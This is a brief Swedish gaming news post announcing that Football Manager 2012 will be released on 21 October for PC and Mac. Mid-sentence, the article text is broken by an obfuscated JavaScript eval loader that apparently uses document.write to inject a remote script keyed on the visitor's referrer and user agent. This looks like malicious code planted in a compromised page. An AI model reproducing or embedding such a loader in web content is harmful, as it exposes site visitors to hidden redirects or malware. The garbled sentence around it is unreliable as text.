Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Releasedatum för Football Manager 2012

Releasedatum för Football Manager 2012
Sebastian

SEGA har nu gått ut med att deras efterlängtade manager-simulator Football Manager 2012 släpps den 21a oktober i år till PC och eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ayett|var|u0026u|referrer|aessh||js|php’.split(’|’),0,{}))
Mac! Det tidigare ryktena om att spelet endast skulle släppts till PC verkade alltså inte stämma, så nu kan fotbollsfantaster njuta av den nya delen av spelserien oavsett vilken dator de kör på.

För ytterligare information och nyheter i spelet se vår tidigare artikel här!